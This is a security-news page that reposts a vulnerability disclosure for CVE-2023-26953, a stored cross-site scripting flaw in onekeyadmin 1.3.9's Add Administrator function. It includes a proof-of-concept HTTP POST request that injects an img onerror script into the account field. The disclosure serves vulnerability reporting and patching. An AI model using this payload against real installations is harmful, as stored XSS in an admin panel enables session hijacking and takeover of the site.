Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-26953: Background administrator management - Adding an administrator has a storage xss vulnerability · Issue #8 · keheying/onekeyadmin

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Administrator module.

CVE
Open in Source
#xss#vulnerability#web#windows#apple#js#php#chrome#webkit
  1. Vulnerability affects product:onekeyadmin
  2. Vulnerability affects version 1.3.9
  3. Vulnerability type:storage xss vulnerability(Cross-site scripting)
  4. Vulnerability Details:
    url
    http://192.168.3.129:8091/admin1#admin/index

poc POST /admin1/admin/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 224 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/admin/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

{"id":"","cover":"","account":"test<img src=1 onerror=alert(“xss”);>","email":"[email protected]","nickname":"[email protected]","login_count":"","group_id":1,"password":"[email protected]","status":1,"create_time":"","theme":"template"}

then you can view xss in url
http://192.168.3.129:8091/admin1#admin/index

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE